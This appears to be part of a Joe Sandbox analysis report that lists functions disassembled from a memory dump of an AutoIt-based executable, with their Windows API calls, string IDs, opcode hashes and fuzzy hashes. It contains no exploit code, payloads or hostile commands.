                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: IconLoad
                                                                                                                                                                                                                                                                              • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                              • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                                                              • Opcode ID: ae4d33dbcc92e040c387b852462b6337d408f4dc89cf5fcaf26100a2415983ac
                                                                                                                                                                                                                                                                              • Instruction ID: b0b73b84d8c1adccc0355d7a0b32f09fea8ff8ed5f6c07a1d3406cde049c3d10
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae4d33dbcc92e040c387b852462b6337d408f4dc89cf5fcaf26100a2415983ac
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A11EB3134870AFBE7355A14EC82DEA779CDF09761B210029FD00A62C1DBFC5E448264
                                                                                                                                                                                                                                                                              Function 0075E73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                              • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                              • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                                                              • Opcode ID: 5c779495dd7bcd932da5703de138231a3aa84f9eca38df94060c0807decffd74
                                                                                                                                                                                                                                                                              • Instruction ID: dff7f124cff51ebd43d0d597eb1a359771de512fa68b2b7560aa7378d14e2a48
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c779495dd7bcd932da5703de138231a3aa84f9eca38df94060c0807decffd74
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D411D271900118BBDB246B649C4EEEA77ACDF05711F1000A9F915A60D1EEBC9F859B60
                                                                                                                                                                                                                                                                              Function 0075F630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 952045576-0
                                                                                                                                                                                                                                                                              • Opcode ID: 19d6f5c1331efe6ac0323aa3785d11a2702887ecefc9b5b276fe27925ae06d9b
                                                                                                                                                                                                                                                                              • Instruction ID: 4b0ada1ce4bdfbe98159777be5e0f5e804c45dff7697428f0180c8c994c42068
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 19d6f5c1331efe6ac0323aa3785d11a2702887ecefc9b5b276fe27925ae06d9b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8941A365C11114F5CB11EBB8CC8AACFB7B8AF05351F508862E508E31A1FA78D695C7E6
                                                                                                                                                                                                                                                                              Function 0078379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 007837B7
                                                                                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 007837BF
                                                                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007837CA
                                                                                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 007837D6
                                                                                                                                                                                                                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00783812
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00783823
                                                                                                                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00786504,?,?,000000FF,00000000,?,000000FF,?), ref: 0078385E
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 0078387D
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                              • Opcode ID: 1a86376ea4278776c867a2402f352ade540641c5c3943fb12205a4be0270dd65
                                                                                                                                                                                                                                                                              • Instruction ID: 39e4dc944b6969e890b3b40544464e64d445c90551a916a1228f92fccf523467
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a86376ea4278776c867a2402f352ade540641c5c3943fb12205a4be0270dd65
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8331BF72240214BFEB218F54CC89FEB3BA9EF09721F044025FE089A1D1D6B99C41C7A4
                                                                                                                                                                                                                                                                              Function 007318A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00731B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 0073194E
                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00731B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 007319D1
                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00731B7B,?,00731B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00731A64
                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00731B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00731A7B
                                                                                                                                                                                                                                                                                • Part of subcall function 00723B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00716A79,?,0000015D,?,?,?,?,007185B0,000000FF,00000000,?,?), ref: 00723BC5
                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00731B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00731AF7
                                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00731B22
                                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00731B2E
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                              • Opcode ID: 0c0cd5411ff72d9b15022ef2da80c2c5d17d9bd37067b0a1bf30965dd58b9142
                                                                                                                                                                                                                                                                              • Instruction ID: 9cadfef0d78b986c591602bc0b6d8b44b29c791f36d3fef4b1c8cbcf27e679cd
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c0cd5411ff72d9b15022ef2da80c2c5d17d9bd37067b0a1bf30965dd58b9142
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4691D771E0025A9AFF208E64CC95FEEBBB59F09310F584569E805E7182EB3DDD41C760
                                                                                                                                                                                                                                                                              Function 00774F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                              • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                              • Opcode ID: e4f25a28b075f3ce4e8706d8a3f33e031a51b83e03a927e6dad3af49fe86e04b
                                                                                                                                                                                                                                                                              • Instruction ID: 79f4ae88519c0c00d989fc414b294e63b04dc1af9a267e7fa61d207b9dc00cf0
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4f25a28b075f3ce4e8706d8a3f33e031a51b83e03a927e6dad3af49fe86e04b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A919271A00619ABDF20CFA4CC48FAEBBB8EF45754F10855DF509AB281D7B89941CFA0
                                                                                                                                                                                                                                                                              Function 007743A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 007743C8
                                                                                                                                                                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 007744D7
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 007744E7
                                                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0077467C
                                                                                                                                                                                                                                                                                • Part of subcall function 0076169E: VariantInit.OLEAUT32(00000000), ref: 007616DE
                                                                                                                                                                                                                                                                                • Part of subcall function 0076169E: VariantCopy.OLEAUT32(?,?), ref: 007616E7
                                                                                                                                                                                                                                                                                • Part of subcall function 0076169E: VariantClear.OLEAUT32(?), ref: 007616F3
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                                              • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                                                              • Opcode ID: 0b7611433ab87e730df5572cfa795303cada2c68d8f906b264819468501d9e1b
                                                                                                                                                                                                                                                                              • Instruction ID: 81c2de7ae5cca5a94001d07dadf709dc11a91284fc845440b5b8ebed4f8ae1f8
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b7611433ab87e730df5572cfa795303cada2c68d8f906b264819468501d9e1b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83916774A083059FCB00EF24C48496AB7E5FF89754F14892DF88A9B351DB39ED06CB92
                                                                                                                                                                                                                                                                              Function 0077560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 007508FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00750831,80070057,?,?,?,00750C4E), ref: 0075091B
                                                                                                                                                                                                                                                                                • Part of subcall function 007508FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00750831,80070057,?,?), ref: 00750936
                                                                                                                                                                                                                                                                                • Part of subcall function 007508FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00750831,80070057,?,?), ref: 00750944
                                                                                                                                                                                                                                                                                • Part of subcall function 007508FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00750831,80070057,?), ref: 00750954
                                                                                                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 007756AE
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 007757B6
                                                                                                                                                                                                                                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0077582C
                                                                                                                                                                                                                                                                              • CoTaskMemFree.OLE32(?), ref: 00775837
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                              • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                              • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                              • Opcode ID: 55f7452fdca5f292b8d04e12a35b322acbd94950ce254636f6ebb98bfcbcd81e
                                                                                                                                                                                                                                                                              • Instruction ID: d4094843d18f8277476cd3780941017d8546b79a699c60fd2d69b5d3b4d45f23
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55f7452fdca5f292b8d04e12a35b322acbd94950ce254636f6ebb98bfcbcd81e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF911671D0021DEFDF14DFA4D880AEEB7B9BF08350F108569E919A7291EB749A44CFA1
                                                                                                                                                                                                                                                                              Function 00782B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetMenu.USER32(?), ref: 00782C1F
                                                                                                                                                                                                                                                                              • GetMenuItemCount.USER32(00000000), ref: 00782C51
                                                                                                                                                                                                                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00782C79
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00782CAF
                                                                                                                                                                                                                                                                              • GetMenuItemID.USER32(?,?), ref: 00782CE9
                                                                                                                                                                                                                                                                              • GetSubMenu.USER32(?,?), ref: 00782CF7
                                                                                                                                                                                                                                                                                • Part of subcall function 00754393: GetWindowThreadProcessId.USER32(?,00000000), ref: 007543AD
                                                                                                                                                                                                                                                                                • Part of subcall function 00754393: GetCurrentThreadId.KERNEL32 ref: 007543B4
                                                                                                                                                                                                                                                                                • Part of subcall function 00754393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00752F00), ref: 007543BB
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00782D7F
                                                                                                                                                                                                                                                                                • Part of subcall function 0075F292: Sleep.KERNEL32 ref: 0075F30A
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                              • Opcode ID: 6a5da8a1d3718a58037b2c5122d58c535d98101d3adf14a0c6a9eed6198aa23d
                                                                                                                                                                                                                                                                              • Instruction ID: d9e9518542e19324139836ec8d37d40a31970a89f5eda847eeccce20482c6860
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a5da8a1d3718a58037b2c5122d58c535d98101d3adf14a0c6a9eed6198aa23d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64718575A40215EFCB10EF64C845AAE7BF1EF48311F148459E815EB352D778ED42CBA0
                                                                                                                                                                                                                                                                              Function 0075B881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetParent.USER32(?), ref: 0075B8C0
                                                                                                                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 0075B8D5
                                                                                                                                                                                                                                                                              • SetKeyboardState.USER32(?), ref: 0075B936
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 0075B964
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 0075B983
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 0075B9C4
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0075B9E7
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 87235514-0
                                                                                                                                                                                                                                                                              • Opcode ID: 8e23f1dd7cdcec0d4bee86468f2ac797aaace7d86990de75a56d4ef74e8f883e
                                                                                                                                                                                                                                                                              • Instruction ID: b6b28f5ef1910310e5ab96546455cb34d28775d7d5f4a084cabadf24e9576480
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e23f1dd7cdcec0d4bee86468f2ac797aaace7d86990de75a56d4ef74e8f883e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4151E1A0A087D57EFB3646348C5ABFABEA96F06305F088489E9D5458D2C3DCACCCD750
                                                                                                                                                                                                                                                                              Function 0075B6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetParent.USER32(00000000), ref: 0075B6E0
                                                                                                                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 0075B6F5
                                                                                                                                                                                                                                                                              • SetKeyboardState.USER32(?), ref: 0075B756
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0075B782
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0075B79F
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0075B7DE
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0075B7FF
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 87235514-0
                                                                                                                                                                                                                                                                              • Opcode ID: 8075017784f9336f0cb2e605433cba5678a8eef0bd2a1749a317f82fbc7a6c87
                                                                                                                                                                                                                                                                              • Instruction ID: 2b2b077dcf35e9f2cf32344c7bc5d51991748c7189bbfcaf75e44f507c58b84c
